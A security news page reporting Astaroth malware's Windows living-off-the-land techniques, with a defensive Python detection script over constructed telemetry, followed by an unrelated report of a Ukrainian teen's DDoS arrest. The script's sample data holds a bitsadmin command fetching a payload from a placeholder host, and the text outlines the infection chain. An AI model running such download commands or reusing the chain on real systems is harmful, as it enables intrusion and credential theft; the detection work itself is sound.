Windows 10 Users Beware! Astaroth Malware Campaign is Back and More Malicious!


A malware group that goes by the name of ‘Astaroth’ has re-emerged stronger and stealthier than before. The group is known for abusing built-in Microsoft Windows tools to carry out its attacks.

Microsoft had become aware of these methods and exposed the malware group and its “living-off-the-land” tactics. But the malware has resurfaced with a spike in activity and improved techniques.

Reportedly, the Windows Management Instrumentation Command-line (WMIC) was the built-in tool abused in the previous campaign, as spotted by Windows Defender ATP.

Per sources, Microsoft’s analysis led to the discovery of a spam operation that spread emails with links to websites hosting a “.LNK” shortcut file. That shortcut instructed WMIC and other Windows tools to run “fileless” malware entirely in memory, out of the reach of file-based anti-malware scanning.

Sources indicate that, having learnt from its mistakes, Astaroth now entirely avoids the use of WMIC. January and February showed a rise in activity.

According to sources, the new campaign still commences with a spam email containing a link to a malicious website hosting an LNK file, but the new version employs an NTFS file attribute, “Alternate Data Streams” (ADS), that lets the attacker attach data to a file that already exists, so that hiding malicious payloads gets easier.

Per source reports, the first step of the campaign, the spam email, reads, “Please find in the link below the STATEMENT #56704/2019 AND LEGAL DECISION, for due purposes”. The link points to an archive file named “Arquivo_PDF_.zip”.

It abuses ExtExport.exe, a legitimate Windows binary, to load the payload, which researchers describe as an extremely unusual attack mechanism.

Once the victim opens the LNK file contained in the .zip archive, the malware runs an obfuscated BAT command line, which drops a JavaScript file into the ‘Pictures’ folder and invokes explorer.exe to run that file.

Researchers mention, and sources confirm, that using ADS keeps the stream data invisible in File Explorer. In this version Astaroth reads and decrypts its plugins from ADS streams attached to desktop.ini; those plugins let Astaroth steal email and browser passwords. It also disables security software.

Per sources, the plugins are the “NirSoft WebBrowserPassView” tool, used to recover browser passwords, and the “NirSoft MailPassView” tool, used to recover email client passwords.

This is not the only legitimate tool Astaroth exploits. “BITSAdmin”, a command-line tool that helps admins create download and upload jobs and track their progress, is abused to download encrypted payloads.
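The chain described in the paragraphs above (a JavaScript file dropped into Pictures and handed to explorer.exe, payloads fetched with BITSAdmin, ExtExport.exe used as a loader, and plugins hidden in alternate data streams on desktop.ini) can be turned into simple triage rules over endpoint telemetry. The script below is an added example written for this page, not Microsoft’s or any vendor’s detection logic. It runs over constructed sample events shaped like process-creation records and Sysmon Event ID 15 (FileCreateStreamHash) records; the paths, user name and stream name in the samples are made up, and the rule thresholds are assumptions a defender would tune to their own environment.

```python
"""Triage of constructed Windows telemetry for Astaroth-style tradecraft.

Added example for this page. Events are modelled after two record types:
  - "process": process creation (image, command line, parent image)
  - "stream":  Sysmon Event ID 15, whose TargetFilename carries 'file:stream'
All sample data below is constructed, not taken from a real incident.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process" or "stream"
    image: str = ""      # process image path
    cmdline: str = ""    # full command line
    parent: str = ""     # parent process image path
    target: str = ""     # stream events: path including ':streamname'


SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)


def rule_script_launched_from_pictures(ev: Event) -> bool:
    """explorer.exe handed a script file living under a user's Pictures folder."""
    return (ev.kind == "process"
            and ev.image.lower().endswith("explorer.exe")
            and "\\pictures\\" in ev.cmdline.lower()
            and SCRIPT_EXT.search(ev.cmdline) is not None)


def rule_bitsadmin_download(ev: Event) -> bool:
    """bitsadmin.exe creating a transfer job that fetches from a URL."""
    cl = ev.cmdline.lower()
    return (ev.kind == "process"
            and ev.image.lower().endswith("bitsadmin.exe")
            and ("/transfer" in cl or "/addfile" in cl)
            and "http" in cl)


def rule_extexport_loader(ev: Event) -> bool:
    """Any execution of ExtExport.exe; legitimate use is rare enough to review."""
    return ev.kind == "process" and ev.image.lower().endswith("extexport.exe")


def desktop_ini_has_named_stream(target: str) -> bool:
    """True when a Sysmon-style 'file:stream' path is a named ADS on desktop.ini.

    Zone.Identifier (mark-of-the-web) is excluded because it is routinely
    written by browsers and is not the pattern described in the post.
    """
    if target.lower().endswith(":$data"):      # some tools append the stream type
        target = target[:-len(":$data")]
    path, sep, stream = target.rpartition(":")
    if sep != ":" or not path.lower().endswith("desktop.ini"):
        return False
    return stream != "" and stream.lower() != "zone.identifier"


def rule_desktop_ini_ads(ev: Event) -> bool:
    return ev.kind == "stream" and desktop_ini_has_named_stream(ev.target)


RULES = {
    "script_launched_from_pictures": rule_script_launched_from_pictures,
    "bitsadmin_download": rule_bitsadmin_download,
    "extexport_loader": rule_extexport_loader,
    "desktop_ini_ads": rule_desktop_ini_ads,
}


def triage(events):
    """Return (rule_name, image_or_target) for every event a rule matches."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev.image or ev.target))
    return hits


# Constructed sample telemetry: two benign records, then one record per stage.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\notepad.exe", "notepad.exe",
          r"C:\Windows\explorer.exe"),
    Event("stream", target=r"C:\Users\alice\Downloads\report.pdf:Zone.Identifier"),
    Event("process", r"C:\Windows\explorer.exe",
          r"explorer.exe C:\Users\alice\Pictures\update.js",
          r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\System32\bitsadmin.exe",
          r"bitsadmin /transfer dl /download /priority normal "
          r"http://stage.example.invalid/p.bin C:\Users\alice\Pictures\p.bin",
          r"C:\Windows\System32\wscript.exe"),
    Event("process", r"C:\Program Files\Internet Explorer\ExtExport.exe",
          r'"C:\Program Files\Internet Explorer\ExtExport.exe"',
          r"C:\Windows\System32\wscript.exe"),
    Event("stream", target=r"C:\Users\alice\Pictures\desktop.ini:plugin1"),
]

if __name__ == "__main__":
    for name, source in triage(SAMPLE_EVENTS):
        print(f"{name:32s} {source}")
```

Each rule is deliberately narrow so that a benign notepad launch and an ordinary mark-of-the-web stream produce no hits, while the four stages of the chain each produce exactly one; in production the hits would be correlated by host and time window rather than reported individually.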

Reportedly, Astaroth has previously wreaked havoc on continents like Asia, North America, and Europe.

Teenager Arrested for DDoS Attack in Ukraine


Ukrainian Police arrested a 16-year-old last month on charges of attacking a local Internet Service Provider (ISP) to gain personal information about its users. The Ukrainian police say that the teen used distributed denial of service (DDoS) attacks to take down the local ISP. This happened after the local ISP refused to give the teenager the details of the user. The severity of the attack made the ISP contact law enforcement last year to resolve the issue.


"The officers at Ukraine Cyber Police hunted down the 16-year-old attacker in the city of Odesa in January," said the spokesperson for the Ministry of Internal Affairs in a conversation with ZDNet. "We explored the teen's home and confiscated all the devices. Upon investigation, the teen was found guilty of the attack. According to the authorities that conducted the preceding inspection of the defendant's system, the authorities found software that the teen used to launch the DDoS attacks. Besides this, details of 20 different accounts related to distinct hacker forums were also found," said the Cyber Police of Ukraine in a statement.

As per the Criminal Law of Ukraine, a person found guilty of a DDoS attack faces imprisonment for up to five years. However, the teen is not charged with attempted extortion of the ISP. The Ukrainian Police have declined to release any further information regarding the case. They have also not disclosed the party affected by the DDoS attack, saying, "the investigation is still in process." It is not the first incident where a DDoS attack was performed to steal user information.

In several other cases, hackers were able to take down an ISP's network using a simple technique such as a DDoS botnet. Instances similar to this case have appeared in countries like Cambodia and Liberia, and in South Africa. As per the observations, to generate junk traffic on a massive scale the attackers use a DDoS botnet, which is very capable; this is what happened in Liberia. Carpet bombing is another efficient technique for performing such attacks, as seen in the incidents in South Africa.